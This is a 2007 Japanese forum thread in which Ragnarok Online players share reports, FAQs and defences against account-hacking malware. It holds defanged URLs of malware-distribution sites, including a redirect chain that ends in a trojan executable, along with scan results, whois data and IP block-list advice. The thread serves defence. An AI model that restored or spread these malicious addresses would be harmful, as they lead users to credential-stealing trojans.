全部 1- 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 最新50


アカウントハック総合対策スレ6
1 名前:L ★ :07/03/15 21:55 ID:???0
アカウントハックに関する情報の集積・分析を目的とするスレです。
被害や攻撃等のアカウントハックの具体的事例に関して扱います。
重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

・ 関連&参考情報アドレス (>>2)
・ 報告用&質問用テンプレ (>>3, >>4)
・ アカウントハック対応の要点とFAQ (>>5)
・ 安全対策の簡易まとめ (>>6)

■スレの性格上、誤って危険なURLがそのまま貼られてしまう可能性がある■
■URLを無闇に踏んで回らないこと。報告・相談はテンプレを利用すること■

※ ID/Pass/サーバ/キャラ名等の情報は公開しないでください
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません
※ ネタや程度を超えた雑談・脱線はご遠慮ください

・スレ立て依頼は>>970がしてください。反応がなければ以降10ごとに。

2 名前:L ★ :07/03/15 21:55 ID:???0
【一般的話題用】
セキュリティ対策、質問・雑談スレ
 http://enif.mmobbs.com/test/read.cgi/livero/1173878067

【過去スレ】
アカウントハック総合スレ 5
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1170419695
アカウントハック被害報告スレ4
 http://gemma.mmobbs.com/test/read.cgi/ragnarok/1164984508
アカウントハック被害報告スレ3
 http://gemma.mmobbs.com/ragnarok/kako/116/1160787177.html.gz
アカウントハック被害報告スレ2
 http://gemma.mmobbs.com/ragnarok/kako/114/1147966576.html.gz
アカハック被害報告スレ
 http://gemma.mmobbs.com/ragnarok/kako/107/1075385114.html.gz

【参考アドレス】
・ROアカウントハック報告スレのまとめ?サイト
 http://sky.geocities.jp/vs_ro_hack/
・安全の為に (BSWikiより)
 http://smith.xrea.jp/?Security
・リネージュ資料室 (応用可能な情報が多数)
 http://lineage.nyx.bne.jp/

【このスレでよく出てくるアプリケーション】
・PeerGuardian2(設定などはリネージュ資料室内・セキュリティ対策参照)
 ttp://lineage.nyx.bne.jp/misc/security/?id=basic-ipfilter

【PCにウィルス対策ソフトを導入してない方へ】
・Kaspersky Anti-Virus (体験版)
 http://www.kaspersky.co.jp/trial/
・カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
 http://www.kaspersky.co.jp/scanforvirus/
・NOD32 アンチウイルス (体験版)
 http://www.canon-sol.jp/product/nd/trial.html

3 名前:L ★ :07/03/15 21:55 ID:???0
【投稿の際の注意】
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています)
・質問前後にテンプレ等を見て知識を深めると更にGoodです
・回答者はエスパーでは有りません。情報は出来るだけ多く。提供した情報の量と質
 に応じて助言の量と質は向上します
・結局は本人にしかどうにも出来ない事を忘れてはいけません

----------報告用テンプレ----------
● 実際にアカウントハックを受けた時の報告用

【      気付いた日時          】 (被害に気付いた日時)
【不審なアドレスのクリックの有無 】 (blog/bbs/Wiki等で踏んだ記憶の有無とそのアドレス)
【他人にID/Passを教えた事の有無】 (Yes/No)
【他人が貴方のPCを使う可能性の有無】 (Yes/No)
【    ツールの使用の有無      】 (Yes/No、Yesの場合はそのToolの説明)
【  ネットカフェの利用の有無    】 (Yes/No)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【説明】
(被害状況を詳しく書く)

4 名前:L ★ :07/03/15 21:55 ID:???0
● 怪しいアドレス?を踏んだ時用

【  アドレス   】 (ドット(.)を■等で置き換える事。h抜き等は駄目)
【気付いた日時】 (感染?に気付いた日時)
【     OS    】 (SP等まで書く)
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 (一番最後はいつ頃か、等)
【 アンチウイルスソフト 】 (NortonInternetSecurity2007 等)
【その他のSecurty対策 】 (Spybot S&D、ルータ、等)
【 ウイルススキャン結果】 (カスペルスキーオンラインスキャンでRODLL.DLL発見 等)
【スレログやテンプレを読んだか】 (Yes/No/今から読みます)
【説明】
(『怪しいアドレス』との判断した理由、症状を詳しく書く)

5 名前:L ★ :07/03/15 21:56 ID:???0
【アカウントハック対応の要点とFAQ】
以下は要点となります。詳細な物は BSWikiの『安全の為に』が参考になると思われます。

● 『アカウントハックアドレスを踏んだ』もしくは『ウィルスが見つかった』場合
 1) 速やかに感染PCのネットワークケーブルを外す
 2) 『安全な環境』から諸々のパスワードを変更
 3) ウィルス駆除 もしくは OSのクリーンインストールやPCの再セットアップを行う

注)
 ・安全確認されるまでNetworkに接続・ROクライアント起動・公式にログインは厳禁
 ・各種メッセンジャーソフトやメールクライアントの起動も避ける
 ・変更するべき物は以下のとおり
  『GungHo-IDパスワード』『アトラクションIDパスワード』『キャラパスワード』『メールアドレス』
 ・アンチウイルスソフトの過信は禁物。自信がなければ再セットアップを第1選択枝とする事
 ・対応は慎重かつ迅速に行う事。早期に対応できればアカウントハックを防げる確率が上がる

● 関連FAQ
・『安全な環境』ってどんな物?
  ウイルスの感染が無いと思われる環境です。別PCや据置型ゲーム機、1CD Linux等が挙げられます。
  インターネットカフェ等不特定多数が使用する環境は危険性の高い環境です。
  また知人友人のPCもインターネットカフェ並の危険があるものと考えるべきです。
  信頼できる友人にパスワード変更を依頼するのは最後の手段であり、安全な環境を
  構築次第、再度パスワードを変更しましょう。
・オンラインウイルススキャンをしたいんだけど、やっぱりネットにつないじゃ駄目?
  駄目です。
・アンチウイルスソフトでウイルスが見つからないのでもう大丈夫だよね?
  100%の保証は出来ません。ウィルスが見つからなかった場合、チェックに使った
  アンチウィルスソフトでは発見出来なかっただけです。本当にウィルスが居ないのか、
  それとも検知を免れているだけなのかは判りません。
  自信が無い場合はHDDをフォーマットの上、PCの再セットアップを考えるべきです
・1CD Linuxってなに?
  CDを入れてPCを起動するだけでLinux環境が起動しちゃうというものです。
  ある意味クリーンインストールに近い状態なので汚染はゼロといえますし、
  そもそもWindowsではないのでアカウントハックウイルスも働きません。
  大概はWindows類似のデスクトップ環境やWebブラウザも組み込まれているので
  パスワード変更作業くらいなら問題なく出来ます。
  "KNOPPIX" や "Ubuntu"が人気が有ります

6 名前:L ★ :07/03/15 21:56 ID:???0
【安全対策の簡易まとめ】
以下は要点となります。higaitaisaku.comさんの『被害対策』→『転ばぬ先の杖』
(http://www.higaitaisaku.com/korobanu.html)が参考になるでしょう。
『ROアカウントハック報告スレのまとめ?サイト』やBSWikiの『安全の為に』も
参考になると思われます。

● 基本
 ・定期的なWindowsUpdate及び、各種ソフト(メディアプレーヤ等)のアップデート
 ・アンチウイルスソフトの導入とウイルス定義ファイルの積極的な更新
 ・パーソナルファイアーウォールソフトの導入
 ・アドレスをホイホイ踏まない。よく確認する
 ・出所の怪しいプログラムやスクリプトを実行しない

● 応用
 ・IEの使用を止め、他のブラウザに乗り換える (Firefox、Opera)
 ・IEコンポーネント使用のブラウザを使う (セキュリティ設定が容易な物が多い)
 ・信頼できるSite以外ではスクリプトやActiveXを切る
  :インターネットオプションのセキュリティの部分で設定可能
 ・偽装jpg対策 (IE6sp2 と IE7限定。IE6sp1以前では出来ない)
  :インターネットオプション→セキュリティ→レベルのカスタマイズ
   →「拡張子ではなく、内容によってファイルを開くこと」の項目を無効にする

7 名前:(^ー^*)ノ〜さん :07/03/15 21:57 ID:I+HsHPxi0
7げと スレ立て乙です

8 名前:(^ー^*)ノ〜さん :07/03/15 22:37 ID:zw3Z99od0
( ゚∀゚)<プップー

9 名前:(^ー^*)ノ〜さん :07/03/15 23:29 ID:Y57LKog00
前スレ >>990
>そのあと、家族共有で再インストールとかできないため

家族共有なら逆にすぐにOS再インストールしろよ。そうでないと家族の情報まで
お前さんのせいで垂れ流しにならんとも限らんぞ。
家族が仕事に使ってたとしたら、仕事を首になるほどの大問題にも
発展しかねないんだから、家族に協力してもらって早めに対応しなさい

10 名前:(^ー^*)ノ〜さん :07/03/15 23:35 ID:eUuDknd+0
確認なんだが
雑談スレもテンプレに入ったし、踏んじゃった助けて、って報告主にはここでは回答せず
セキュリティ対策、質問・雑談スレ
 http://enif.mmobbs.com/test/read.cgi/livero/1173878067
に誘導でおk?

11 名前:(^ー^*)ノ〜さん :07/03/15 23:39 ID:tVmtCQDo0
>>10
ok

12 名前:(^ー^*)ノ〜さん :07/03/16 00:04 ID:/2uIW1kP0
>>10
っても、向こう報告用のテンプレ(>>4)無いね・・・。
まぁ作れば(こっちにあるのそのまま活用でも)いいだけなんだけどさ。

で、前スレ >>990
まずは>>4を埋めるのが先決だと思うよ。
そうすればどうすればいいかもある程度わかってくるだろうし。

13 名前:これも追加しとこう。 :07/03/16 01:16 ID:YzFRLToN0
キャラクタースロットの空きスロットについて。

ハッキングされたされないに関わらずに埋めておくほうが得策だと思われます。

β時代に頻繁に、混戦時に繋げようとすると他人のアカウントに繋がる現象というのがありました。
もし今そういうものが再発したorなんらかの不具合で発生した場合にも、
キャラ枠が空いて居ればノービスを作ってごっそり倉庫のもの持っていかれますし、
キャラが埋まっていてパス設定していれば被害無しになります。

これは今問題になっているハックとは違いますが、万が一こういった事が置きた場合なども考えると
プレイしているサーバーのキャラクター枠は埋めておいたほうが安心できると思います。

14 名前:(^ー^*)ノ〜さん :07/03/16 02:30 ID:qd+hN8to0
サウスバウンド系追加
http://www.southbound-inc■com/images/pricejtopro.gif (gif偽装html)
-> http://www.southbound-inc■com/lib/smarty/internals/smartyro.htm
--> http://www.lineagecojp■com/tro/tro.exe

今後は一見それっぽくない…、たとえば .co.jp のサイトなんかも
気にしないといけなくなったということですねぇ。

もう「踏まないこと」は限界。
踏んでも痛くない状態にしておくことが必須でしょう。


メモ:
Active Virus Shield
http://www.activevirusshield.com/

面白そうだけど まだ評価できてません。

15 名前: ◆sp4Sh9QXGI :07/03/16 02:50 ID:kqHrUt7f0
>>1さま
スレ立てお疲れさまです。

とりあえずサイト更新しました。
このスレには出てきていませんが、リネージュ資料室さまで見かけた
ragnarok-bbs■comというドメインも追加しています。

それではおやすみなさいノシ

16 名前:(^ー^*)ノ〜さん :07/03/16 03:06 ID:R201HhuO0
ttp://internet.watch.impress.co.jp/cda/news/2006/12/01/14107.html

こういうのも良いかもしれない。

17 名前:(^ー^*)ノ〜さん :07/03/16 03:23 ID:R201HhuO0
ネトゲ用のRBL(リアルタイムブラックリスト)なんてどうだろう。
もうすでに他がやってるかな。

18 名前:(^ー^*)ノ〜さん :07/03/16 06:03 ID:8+QVgf0R0
しむらー(依頼者)、スレタイスレタイ!
分かり良いように『問題』とか『対策』って語を入れるって流れじゃなかったっけ。

スレの使い分けをはこんな感じかね
・ここ
-> 『被害対策』『情報提供』 (スレ違いはLiveROに誘導)
・LiveRO
-> 『被害相談』『セキュリティに関する一般的話題』『雑談』

とりあえずこっちのスレだけ読んでおけば非スレ住民でも対策のための情報は
十分ゲットできる、そんな感じがよさげと思う。情報の密度を上げる為に
できるだけLiveROを活用すべきだなーと思う。なんか合宿所スレみたいな構造だなー。

セキュリティパッチの情報とかはこっちでも良いと思うけど、
ちょっとした思い付きとか(前スレ988のような物でも)はLiveROの方がいいと思う。
実際にやってみて効果のあることなら此方でも良いと思うけど。

あと職テンプレに貼られてた、新ドメイン名と思しき物。
http://www■slower-qth■com/8651262/
http://www■wikiwiKi-game■com/8651262/

前者はリネージュ資料室に既出なので、後者のみDomaintoolsによる情報アドレス。
http://whois.domaintools.com/wikiwiki-game.com

19 名前:(^ー^*)ノ〜さん :07/03/16 06:32 ID:5ajOPH8Z0
垢ハックのは装備換金RMT目的

俺は注意を呼びかけたりするまでデカクなると誰も買わなくなって自滅すると思うのだが
これだけ何かあってもまだ買ったりする人がいるって怖いよな・・・買ってる人も職別wiki見てるだろう?

20 名前:(^ー^*)ノ〜さん :07/03/16 07:43 ID:8x0LbUiBO
職WIKIやネカフェでやられても、不正者乙で片付けられてしまうからな。
やられたことのない奴の共通認識は、「自分だけは大丈夫」

21 名前:(^ー^*)ノ〜さん :07/03/16 12:11 ID:G1LDBCDU0
>>14氏のいう
> もう「踏まないこと」は限界。
> 踏んでも痛くない状態にしておくことが必須でしょう。
これに尽きる気がする。

もう中国のIPを総弾きするしかないような気がしてきたよ。
これだけ見境なくハックアドレスが張られてる現状じゃ
みんなで頑張って情報を提供しあっていても後手になっちゃうし。
極端すぎるかな…。

中国 IPv4
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=cn

FWにJeticoを使っている人なら、非公式ヘルプを公開してくれてる方の
Wikiから中国・韓国のIPリストが入手できるよ。
中国のホムペとか見ない人なら、一気にBlockZoneに設定できるので楽かも。

22 名前:(^ー^*)ノ〜さん :07/03/16 12:42 ID:dUaKmVnF0
>>21
>もう中国のIPを総弾きするしかないような気がしてきたよ。
特別な理由が無ければ中国へのあらゆる接続を最初から全て禁止にして
必要な所だけその都度許可していく方法で問題ないだろう。
アカウントハッキングのために使われるドメインを無差別に与えてる事実もあるし
極端な対応だとは思わないな。

23 名前:(^ー^*)ノ〜さん :07/03/16 13:17 ID:yisC8ByJ0
質問
垢ハクってキャラパスはいちいちSS取って送ってるんだよな?
4つの数字入れるとき1を押すと2を押したことになるように
パスワードの押す数字と送る数字を好きなように変えるツールがあるんだけど
これってNG?

24 名前:(^ー^*)ノ〜さん :07/03/16 13:19 ID:o5q9mpEi0
>21-22
リネ資料室には昔から中韓台リストがあるわけで……
PG2を導入した人はあそこを見てるはずで、その時に一緒に中韓台リストがあるわけで。
中華系を気にする人は既にブロックしてると思う。

それよりこちらで報告が無かった(と思う)ので資料室さんところから転記。

>2007/3/11
>「セキュリティ対策」および「スパム対策」で、ウィルスサイトへの誘導記事にスパム投稿元アドレスを
> fj.cn.cndata.com から 163data.com.cn に変更(プロバイダ側でドメイン設定を変更したため)。
>アクセス拒否にドメイン名を指定して設定している方は、上記ドメインに変更しておくことをお勧めします。
>できればしばらくの間は新旧両方のドメインを設定しておくと良いでしょう。

25 名前:(^ー^*)ノ〜さん :07/03/16 13:27 ID:aFxEnVMI0
>>23
MMOBBSではその手の話題は禁止なので
LiveROの支援ツールスレへどうぞ

26 名前:(^ー^*)ノ〜さん :07/03/16 13:29 ID:m6MYXZyj0
>>23
ツールの是非はともかくパケット読まれたら意味がないとだけ

27 名前:(^ー^*)ノ〜さん :07/03/16 13:34 ID:ossJ+oXA0
>>23
SS撮って送れば盗み出せるというだけであって、SS撮ってる(山田ウィルスのような)ものが確認された訳ではない。
単なる方法論。

現在わかっているものでは、パケを読み取るものならある。

>これってNG?
MMOBBSではNGであり、なおかつ、現在主流のものに対しては無力。

28 名前:(^ー^*)ノ〜さん :07/03/16 14:36 ID:o5q9mpEi0
セキュリティ雑談スレより
------------------------------------
14 名前:(○口○*)さん Mail:sage 投稿日:07/03/16 (金) 13:50 ID:rYnyKtqR0

136 :(^ー^*)ノ〜さん :07/03/16 12:24 ID:OSeBMiF30
これでもみて落ち着け
ttp://up■uppple■com/src/up2551.jpg

MMO-BBS弓手系の情報交換スレ 228
より抜粋

アップローダーそのものはノーマルのもの。
Jpeg偽装でもってくタイプですね
即座にウィルス警告だしてくれた人がいたので心配はないと思うけど一応。
会話の流れがヒートしてたところにだしてきたし、中華以外かしら(?´・ω・`)

一応実際に狐からファイル保存でDL、バイナリでチェックだけさらっとかけました。
Avastさんはトロイと認定っと。相変わらず重いけど優秀(でも時々スっとろいねん)な子だ。
------------------------------------

中身はhtmlだが100kb超えるサイズになってる上、ブラクラやbbs-qrcode・zhangweijpへの
リンクもあって大変危険。
何名か踏んだ人がいるようなので、ご注意を。

29 名前:(^ー^*)ノ〜さん :07/03/16 15:09 ID:ossJ+oXA0
>>28
ちょ・・・iframeだらけ

30 名前:(^ー^*)ノ〜さん :07/03/16 15:12 ID:AqkDK5340
>>28
危険な物詰め合わせって感じだな

31 名前:(^ー^*)ノ〜さん :07/03/16 15:40 ID:j3I8p+8Z0
詰め合わせというレベルじゃねーぞ(AA略
いやマジで爆弾に近い。

どんなマルウェアが何個仕込まれるかわかったもんじゃない。
下手すれば3桁とかぶち込まれる可能性があるし、これを踏んだ人は冗談抜きで
HDDフォーマットの上OS再インストールしたほうがいい。

32 名前:(^ー^*)ノ〜さん :07/03/16 16:50 ID:1Zn1d/6L0
今googleでROM776検索して一番上に出てきたサイト踏んじまったんだが…

すぐに戻ったもののウイルス喰らった気が(´・ω・`)

33 名前:(^ー^*)ノ〜さん :07/03/16 16:59 ID:wDwDl1lN0
宣伝乙

34 名前:(^ー^*)ノ〜さん :07/03/16 17:06 ID:1Zn1d/6L0
>33
厨はすっこんでろ

…と言いたいところだがアンタが正しい、
変なのはSleipnir検索の方だった、吊ってくるorz

35 名前:(^ー^*)ノ〜さん :07/03/16 17:15 ID:ap8TDRK50
結局この子は何がしたかったんだ?

36 名前:(^ー^*)ノ〜さん :07/03/16 17:24 ID:1Zn1d/6L0
>>35
↓リンク先注意↓
http://whois.domaintools.com/rom776.com

コレ踏んで焦ってテンパってた(´д`;)
結局何のページなのかは不明…

37 名前:(^ー^*)ノ〜さん :07/03/16 17:25 ID:MJvVMGUw0
そのまま貼るんじゃなくて改変しろよ

38 名前:(^ー^*)ノ〜さん :07/03/16 17:28 ID:1Zn1d/6L0
>>37
悪い…こういう所あんまり書き込まないから勝手が解らなかった

これからはテンプレくらい見るよ

39 名前:(^ー^*)ノ〜さん :07/03/16 18:00 ID:HqAEpsgG0
>>36
domaintoolsはドメインの所有者情報を調べるサイト
誰かが検索すると情報はキャッシュされ、会員限定で過去の情報も閲覧できる

「踏んで焦ってテンパってた」がrom776■comのことを指してるのであれば
いまのところどんなサイトなのか明らかになってないな

40 名前:(^ー^*)ノ〜さん :07/03/16 18:24 ID:gzxNkvLI0
現時点では、サイトに書かれている文面からは、SEO絡みの検証目的くらいしか読み取れない。
但し、既存の有名情報サイトに類似したドメインを取得している時点で、安易に考えるのは禁物。
ドメインスクワッターに転じるかもしれないし、迷いこませる事自体を目的にしたアフィリサイトに変貌するかもしれない。

41 名前:(^ー^*)ノ〜さん :07/03/16 19:05 ID:r+VFK07a0
いつもの福建人により以下が登録された。
wikiwiki-game■com

数日前にはてなが不正アクセスでIRC BOT設置されてたらしいので各種サイト持ちはアカウント管理に要注意。
所謂ブルートフォースだと言う。

そういえば以前はてなに垢ハック目的のアカウントとページが幾つかあった。
リネージュ資料室の感染源サイトページでもその時のURLが見れる。
ひょっとすると・・・。

杞憂であれば良いが。
とにかくご用心ご用心。

42 名前:(^ー^*)ノ〜さん :07/03/16 20:07 ID:YzFRLToN0
せめて福建人くらいは逮捕されてくれいないものか・・・

43 名前:(^ー^*)ノ〜さん :07/03/16 20:35 ID:Aj05lLeM0
以前にも報告したものですが、また私のブログにアカハック目的と思われる書き込みがありました。
承認後表示の設定にしておいてよかった。

ちなみに、

訪問及び足跡並びにコメントおおきに(*^v^*)
//www■geocitylinks■com/games/jp.htm

記録されているIPは210.16.212.10でした。

以上、報告します。

44 名前:(^ー^*)ノ〜さん :07/03/16 20:58 ID:ME/9GXJw0
悪意ある投稿を受けた自サイト持ちは、契約ISP(Blogレンタル元含む)への通報もセットで。
ユーザーからの突き上げが多くなれば、やがては国内ISPやIXでインバウンド遮断も検討せざるを得なくなるだろう。
只でさえ、spamの発信元やクラッカーの巣となっている訳だし。

45 名前:(^ー^*)ノ〜さん :07/03/16 21:15 ID:oB0VRtd90
噂のカスペルスキーにしてみた
トロイ3つ見つかった(((;゚д゚))

RO起動すると赤い警告出るんだが俺だけ?

46 名前:(^ー^*)ノ〜さん :07/03/16 21:16 ID:wf+5iB8z0
それはnProが行儀悪いから検出してるだけ。

47 名前:(^ー^*)ノ〜さん :07/03/16 21:16 ID:jd1MgV8y0
セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

48 名前:(^ー^*)ノ〜さん :07/03/16 21:18 ID:/d8O4SNx0
IPアドレス 210.16.212.10
ホスト名  対応するホスト名がありません
IPアドレス
 割当国 ※ 韓国 (KR)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

49 名前:(^ー^*)ノ〜さん :07/03/16 21:20 ID:U9+0MnuU0
BOTを放置していたツケが回ってきたな
毎日誰かがハック当たり前のゲームになったら完全に終わる

50 名前:(^ー^*)ノ〜さん :07/03/16 21:56 ID:ME/9GXJw0
>>43
>IPv4 Address : 210.16.212.0-210.16.212.63
>Network Name : HANINTERNET-LLINE-PCROOMHOHOKJ
>Connect ISP Name : HANINTERNET
>Registration Date : 20060602
>Publishes : N

PC房割り当てIPの模様。差し支えが無ければ/26丸ごと拒否で良いかと。

51 名前:(^ー^*)ノ〜さん :07/03/16 22:42 ID:8+QVgf0R0
あるWikiへのアカハクアドレス書込より。
www■rokonline-jp■com/blog/

DomainToolsではこんな感じ。又新ドメイン名投入かな。
http://whois.domaintools.com/rokonline-jp.com

Creation Date........ 2007-03-13 18:57:35
Registration Date.... 2007-03-13 18:57:35
Expiry Date.......... 2008-03-13 18:57:35
Organisation Name.... hang long
Organisation Address. lyzsl
Organisation Address.
Organisation Address. ly
Organisation Address. 364000
Organisation Address. FJ
Organisation Address. CN

52 名前:(^ー^*)ノ〜さん :07/03/16 22:49 ID:AdRGeoG+0
報告おつかれさまです。

個人的に色々と自衛にも限界を感じてきた。
一旦警鐘age

53 名前:(^ー^*)ノ〜さん :07/03/16 23:00 ID:z7oRh5n+0
>>18
対策って入ってるぜ

54 名前:(^ー^*)ノ〜さん :07/03/16 23:08 ID:tfdsmJLN0
>>52
偽装とかまでやられるとさすがにな・・・
公式で何も無い所見ると癌呆的にはウェブサイト見なければOKって感じなのかね

55 名前:(^ー^*)ノ〜さん :07/03/17 00:01 ID:VkLOJJ/A0
カスペルスキーオンラインスキャンしながら色々見てるんだが
既に1つウィルス発見されてる
ノートン先生仕事してくださいw

56 名前:(^ー^*)ノ〜さん :07/03/17 00:24 ID:vmuP/yNT0

    ____
   /      \
  /  ─    ─\  
/    (ー)  (ー) \
|       (__人__)    |
/     ∩ノ ⊃  /
(  \ / _ノ |  |
.\ “  /__|  |
  \ /___ /

57 名前:(^ー^*)ノ〜さん :07/03/17 00:28 ID:ycmdTg5p0
こっちよりLiveROの方が質が高い気がしてきた

58 名前:(^ー^*)ノ〜さん :07/03/17 00:32 ID:dcj6loMh0
使い分ければいいだけ。
告知スレと突っ込みすれのように、報告系はこっちに集約すればいい。

基本的にスレが伸びない方がいいわけで、未読が多いとアウトブレイクが
発生したのかと焦るし。

59 名前:(^ー^*)ノ〜さん :07/03/17 00:42 ID:Ye/z/7wJ0
>>55
普及率高い割りに見事役立たずだったノートン先生ですが、
手元の環境では木曜日あたりからよーやく検知してくれているようです。
# 調査用の検体見事に喰われちゃったよ。

>>14 自己フォロー

Active Virus Shield
http://www.activevirusshield.com/

近頃話題のAOL提供の無料で使えるウィルス対策ソフトです。
サイトからメールアドレス入力。メールで受け取ったアクティベーション
キーをインストール後に入力すればOK。めんどい入力フォームとか無し。

英語版しか提供されていませんが、別段困ることはないでしょう。
市販版からは省略されている機能があるらしいのですが、定評ある
エンジンですから対アカハックに限定して言えば、下手な更新 0円
ソフトよりベターなのかもしれず…。

まだ一日使っただけですが、個人的にはオススメできるかなと。
ファイアウォール機能はないので別途ご用意の上合わせてご利用ください。

60 名前:(^ー^*)ノ〜さん :07/03/17 00:53 ID:RtPx62Rp0
>>59
それ、BSWikiのページで
>検出力はエンジンのおかげで優れているが、規約に『個人情報を収集する』等
>あるので選択としては微妙感あり
って紹介されてるんだな。でもって2chのセキュリティ板にもスレがあって、
http://pc11.2ch.net/test/read.cgi/sec/1170858305/
とりあえず現状では何もないみたい。個人情報ってのを過度に気にする
必要は無いと思うが、津垢う上では頭に入れておくべきだと思う。
因みにあの某ネットランナーではフリーで最優秀のアンチウイルスソフトに
決定されたとか何とか。

61 名前:(^ー^*)ノ〜さん :07/03/17 01:23 ID:SrvsyBRw0
つあかう

なんかかわいい

62 名前:(^ー^*)ノ〜さん :07/03/17 05:55 ID:tRg+Klrb0
【  アドレス   】http://www■lineagejp-game■com/8651262
【気付いた日時】 3/16
【     OS    】 Windows 2000 SP4
【使用ブラウザ 】 IE6
【WindowsUpdateの有無】 一週間前?不明
【 アンチウイルスソフト 】 対策無し 感染に築いてからカスペル導入
【その他のSecurty対策 】 (Spybot S&D、Ad-Aware SE personal)
【 ウイルススキャン結果】
Trojan-Downloder.JS.Agent.dj
Trojan-Downloder.JS.Agent.bw
Trojan-Downloder.JS.Agent.di
【スレログやテンプレを読んだか】 (Yes)
【説明】

低価格でナイスなヘッドフォン
ttp://wiki.nothing.sh/52.html
(改めて右欄のURLを見てみると、リネージュ系のURLが大量に出てくる)

飛んだ先で青画面、驚いてオンラインスキャンしてみたら…という感じでした。
オンラインゲーム系のWIKIだけではなく、こういうのも危険なんだと
改めて認識した次第です。
とりあえずはご報告までに。

63 名前:(^ー^*)ノ〜さん :07/03/17 06:16 ID:2dqdMFc50
スレ一覧dだっぽいんでage

64 名前: ◆sp4Sh9QXGI :07/03/17 06:33 ID:iifDZB9r0
おはようございます、中の人です。
朝イチで更新しました。寒いです。
rokonline-jp■com  →  202.75.223.131
見たことのないIPだったので、PG2用リストは積極版も一緒に更新しています。
ご確認ください。
またguild-wars-online■comにもいつの間にか
208.113.160.130というIPが割り当てられていたようなのでこちらも一緒に。

#jprmthomeは新ドメイン取得に必死ですねぇ…。

65 名前:(^ー^*)ノ〜さん :07/03/17 11:37 ID:G1lAm/Pg0
下がりすぎだと思ったので警鐘age

66 名前:(^ー^*)ノ〜さん :07/03/17 14:13 ID:3Ab75Vg30
うちのBBSに文字化けで投稿されていた垢ハック書込み。

投稿者のIP:165.228.132.11(AustraliaのIP)

アクセスログ:偽装してないなら、普通にIE6ですね。
[2523][2007/03/16,19:00:17]--Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

(new) 云社ROと曳ン^すると 名前: RO-BBS [2007/03/16,19:01:49] No.373 返信
久何ォ@誼スUYcA饗ハ 50蔚
垢恬ォ@誼スUYcA饗ハ 50蔚
アイテムドロップ楕 8蔚
廾や」疋蹈奪彗ハ 8蔚
カゥ`ドドロップ楕 40蔚
恷仟マップとオリジナルモンスタゥ`携廾。
オリジナルNPC嗤り。
ペットボゥ`ナス原紗嗤り
タナトス、テコン、般宀、ガンスリンガゥ`携廾
伏悶携Y侭、壼「龍歓漾▲侫譽・餤遏「
アルナペルツ縮忽、オゥ`ディン舞去、キルハイル吉携廾
騅゚Bサイトを歌孚して和さい
http://www■ragnarok-bbs■com/links/

67 名前:(^ー^*)ノ〜さん :07/03/17 14:13 ID:3Ab75Vg30
「www■ragnarok-bbs■com」のIPアドレスへの変換結果→「222.77.185.87」

inetnum: 222.76.0.0 - 222.79.255.255
netname: CHINANET-FJ
descr: CHINANET fujian province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: CA67-AP

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: anti-spam@ns.chinanet.cn.net
address: No.31 ,jingrong street,beijing
address: 100032

role: CHINANETFJ IP ADMIN
address: 7,East Street,Fuzhou,Fujian,PRC
country: CN
nic-hdl: CA67-AP
mnt-by: MAINT-CHINANET-FJ

68 名前:(^ー^*)ノ〜さん :07/03/17 21:10 ID:SJAIMCAQ0
丁度1年前に垢ハック逢ったんだけど
今から警察言行っても間に合うカナカナ?
やっぱ1年も経ってたらサポートしてくれないかな・・・

69 名前:(^ー^*)ノ〜さん :07/03/17 21:23 ID:A+Jt1NU40
うだうだ言ってる暇があるなら、さっさと警察行け。

70 名前:(^ー^*)ノ〜さん :07/03/17 21:35 ID:G1lAm/Pg0
誰の言葉か忘れたけど、こういうのがある。

例えば君が、私に対して「小説を書きたいと思っています」と言ったとする。
しかし、私は君が本気で小説を書きたいと思っているとは思わない。
何故なら、本当に君が小説を書きたいのであれば私と話すことなどなく、
既に机に向かっているはずだからだ。

つまり、まずは行動しなさいってこった。

71 名前:(^ー^*)ノ〜さん :07/03/17 22:44 ID:GLhpoqOZ0
某イタリアマフィアの人もそんなようなこといってたなw

72 名前:(^ー^*)ノ〜さん :07/03/17 23:04 ID:YRDFUXNz0
>>68-71
雑談や質問等は雑談スレでしましょ。
情報を求めてやってくる人が把握しやすいようにする為にもさ。

73 名前:(^ー^*)ノ〜さん :07/03/18 00:51 ID:W+4ySq/60
>>70
既に書いていたら、「小説を書いています」と言わないとおかしいだろ。
それに行動を起こすことをまず思うからこそ行動に起こすんだろ?

74 名前:(^ー^*)ノ〜さん :07/03/18 01:29 ID:kfNuJCuL0
>73
まず行動しろ

75 名前:(^ー^*)ノ〜さん :07/03/18 01:49 ID:JDgehqw60
わざとやってるの?雑談はこっちでやってよ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

76 名前:(^ー^*)ノ〜さん :07/03/18 02:39 ID:9vmZiN1o0
はいはい、本日目撃の垢ハックアドレス。既出だったらごめんね。

ラグナロク自動の攻撃回復HP.PKスピードを加速する
--------------------------------------------------------------------------------
ラグナロク自動の攻撃回復HP.PKスピードを加速する
2007.3更に新版は
以前ラグナロクプレーヤーの当製品に対する支持に感謝するため.
2006.12会社は研究?開発してラグナロク自動のプログラムを更新して、
無料で使う;
リネージュ自動の攻撃回復HP.PKスピードを加速する
登録と申し込みは.より詳しい情報は//www■din-or■com/bbs

